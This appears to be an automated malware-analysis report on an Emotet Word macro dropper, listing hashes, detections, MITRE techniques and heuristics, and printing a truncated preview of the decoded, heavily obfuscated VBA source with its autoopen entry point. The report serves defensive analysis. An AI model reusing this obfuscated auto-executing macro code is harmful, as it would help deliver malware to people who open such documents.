Emotet Office (OLE) malware analysis — malicious · be0dcbad82b966a2

MALICIOUS

Office (OLE)

160.9 KB Created: 2019-05-02 16:38:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: d627cabee869cc6d352d30995099be32 SHA-1: aeb82013953a10a57249afeff2705da0bab59f79 SHA-256: be0dcbad82b966a23a75ebb83ebdc219d0ceb0c7ffb3090e7c5e33b059346bc5

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1137.001 DLL Search Order Hijacking T1059 Command and Scripting Interpreter

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emotet-6960272-0', indicating a known Emotet variant. Critical heuristics indicate the presence of VBA macros that utilize WMI to launch processes, a common technique for executing downloaded payloads. The auto-executing macro and GetObject calls further support the malicious intent.

Heuristics 7

ClamAV: Doc.Dropper.Emotet-6960272-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-6960272-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31128 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31128 bytes
SHA-256: `4f3093ec7f2a34dd95d0f6d69576f287a6a24d536d190bdd3d1d94a8aa2bea8f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "P304821" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "B854667" Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Z03201" Attribute VB_Name = "C37266_" Attribute VB_Name = "c955609" Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "l4722754" Function F497_66(z64_72) Select Case n5554069 Case i465376 = b66820 = Sgn(471333696) Case s7261945 = p89161 Case a504467_ = Log(n36069) Case J239105 = CBool(451270235) Case n6_881 = 957082140 Case i3801617 = CDate(v3_2193) End Select Select Case Y3_0594 Case Y6613_ = E47130 = Sgn(182332894) Case c71647 = R47376_ Case n46623 = Log(S7943494) Case n472_7 = CBool(455423588) Case O9698_32 = 838331306 Case X536__2 = CDate(w9_432) End Select Select Case Q6495_83 Case U32_903 = z8674829 = Sgn(468039462) Case i2662841 = p443443 Case s91043 = Log(w1433080) Case j9172563 = CBool(377410670) Case C5_836_ = 496974668 Case K495__ = CDate(X742764) End Select Set F497_66 = CVar(z64_72) Select Case b52_114 Case d62_87 = k___192 = Sgn(709969944) Case D_9917 = m52179 Case k0302_1 = Log(s5867_3) Case P95956 = CBool(855892121) Case C5742481 = 236360998 Case z2_23326 = CDate(V07769) End Select Select Case V216_3 Case p1113571 = z_8__7 = Sgn(122239280) Case C9947_1 = q754866 Case Z965280 = Log(W63641) Case J185126 = CBool(897905841) Case n74256_7 = 117942140 Case f159_85 = CDate(M48245) End Select Select Case U7_449 Case b925_199 = a575393_ = Sgn(483630630) Case U72964 = o71205 Case H8129321 = Log(z43254_7) Case w86876 = CBool(291986409) Case L810_13 = 458547345 Case G61904_ = CDate(L933330) End Select End Function Sub autoopen() Select Case h_09641 Case p7_418 = R5123_ = Sgn(377277628) Case s46998 = K92527 Case S766_3 = Log(R42056_6) Case Z8251__ = CBool(30290621) Case S8395005 = 889515263 Case f29566 = CDate(l0719212) End Select Select Case C1040_9 Case s26389 = A6_9_271 = Sgn(964608343) Case S6_21414 = m6352781 Case P25767 = Log(u43_39) Case t_508681 = CBool(267674597) Case T9601268 = 242473150 Case j66_5_7 = CDate(V36987) End Select Select Case u_368338 Case h298942 = o133250 = Sgn(56115851) Case I_501102 = A688875 Case Y846787 = Log(D2925008) Case j8_345 = CBool(626239198) Case b661584 = 108196528 Case n355119 = CDate(D90_4208) End Select Call X01_884 Select Case i747408_ Case O4470_71 = z36309_ = Sgn(778089229) Case z_142047 = q00083_ Case o05739 = Log(F97___) Case S3_517_9 = CBool(596131204) Case R77705 = 712650870 Case d4078830 = CDate(s0424__) End Select Select Case L385843 Case P231831 = i05537 = Sgn(839811757) Case n_62440 = b023649 Case j8206679 = Log(p_179_) Case B3002277 = CBool(49099996) Case W177933 = 187188136 Case z669098 = CDate(O31496) End Select End Sub Attribute VB_Name = "r71782" Function X01_884() On Error Resume Next Select Case C36046 Case L925428 = r32461 = Sgn(73907688) Case z3453775 = I_01619 Case K171433 = Log(p73684) Case N97700_ = CBool(264746464) Case z28386 = 653461758 Case V312_147 = CDate(j46619) End Select Select Case R9529912 Case B_8503 = q9378825 = Sgn(210491738) Case Q359_577 = u8_73094 Case T_6727 = Log(l_4753) Case f29_3760 = CBool(911317383) Case w50413 = 639562234 Case k084860 = CDate(Q480438) ... (truncated)

SHA-256: 4f3093ec7f2a34dd95d0f6d69576f287a6a24d536d190bdd3d1d94a8aa2bea8f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "P304821"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "B854667"
Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z03201"

Attribute VB_Name = "C37266_"

Attribute VB_Name = "c955609"
Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "l4722754"
Function F497_66(z64_72)
   Select Case n5554069
Case i465376 = b66820 = Sgn(471333696)
Case s7261945 = p89161
Case a504467_ = Log(n36069)
Case J239105 = CBool(451270235)
Case n6_881 = 957082140
Case i3801617 = CDate(v3_2193)
End Select
   Select Case Y3_0594
Case Y6613_ = E47130 = Sgn(182332894)
Case c71647 = R47376_
Case n46623 = Log(S7943494)
Case n472_7 = CBool(455423588)
Case O9698_32 = 838331306
Case X536__2 = CDate(w9_432)
End Select
   Select Case Q6495_83
Case U32_903 = z8674829 = Sgn(468039462)
Case i2662841 = p443443
Case s91043 = Log(w1433080)
Case j9172563 = CBool(377410670)
Case C5_836_ = 496974668
Case K495__ = CDate(X742764)
End Select
Set F497_66 = CVar(z64_72)
   Select Case b52_114
Case d62_87 = k___192 = Sgn(709969944)
Case D_9917 = m52179
Case k0302_1 = Log(s5867_3)
Case P95956 = CBool(855892121)
Case C5742481 = 236360998
Case z2_23326 = CDate(V07769)
End Select
   Select Case V216_3
Case p1113571 = z_8__7 = Sgn(122239280)
Case C9947_1 = q754866
Case Z965280 = Log(W63641)
Case J185126 = CBool(897905841)
Case n74256_7 = 117942140
Case f159_85 = CDate(M48245)
End Select
   Select Case U7_449
Case b925_199 = a575393_ = Sgn(483630630)
Case U72964 = o71205
Case H8129321 = Log(z43254_7)
Case w86876 = CBool(291986409)
Case L810_13 = 458547345
Case G61904_ = CDate(L933330)
End Select
End Function
Sub autoopen()
   Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case s46998 = K92527
Case S766_3 = Log(R42056_6)
Case Z8251__ = CBool(30290621)
Case S8395005 = 889515263
Case f29566 = CDate(l0719212)
End Select
   Select Case C1040_9
Case s26389 = A6_9_271 = Sgn(964608343)
Case S6_21414 = m6352781
Case P25767 = Log(u43_39)
Case t_508681 = CBool(267674597)
Case T9601268 = 242473150
Case j66_5_7 = CDate(V36987)
End Select
   Select Case u_368338
Case h298942 = o133250 = Sgn(56115851)
Case I_501102 = A688875
Case Y846787 = Log(D2925008)
Case j8_345 = CBool(626239198)
Case b661584 = 108196528
Case n355119 = CDate(D90_4208)
End Select
Call X01_884
   Select Case i747408_
Case O4470_71 = z36309_ = Sgn(778089229)
Case z_142047 = q00083_
Case o05739 = Log(F97___)
Case S3_517_9 = CBool(596131204)
Case R77705 = 712650870
Case d4078830 = CDate(s0424__)
End Select
   Select Case L385843
Case P231831 = i05537 = Sgn(839811757)
Case n_62440 = b023649
Case j8206679 = Log(p_179_)
Case B3002277 = CBool(49099996)
Case W177933 = 187188136
Case z669098 = CDate(O31496)
End Select
End Sub

Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
   Select Case C36046
Case L925428 = r32461 = Sgn(73907688)
Case z3453775 = I_01619
Case K171433 = Log(p73684)
Case N97700_ = CBool(264746464)
Case z28386 = 653461758
Case V312_147 = CDate(j46619)
End Select
   Select Case R9529912
Case B_8503 = q9378825 = Sgn(210491738)
Case Q359_577 = u8_73094
Case T_6727 = Log(l_4753)
Case f29_3760 = CBool(911317383)
Case w50413 = 639562234
Case k084860 = CDate(Q480438)

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.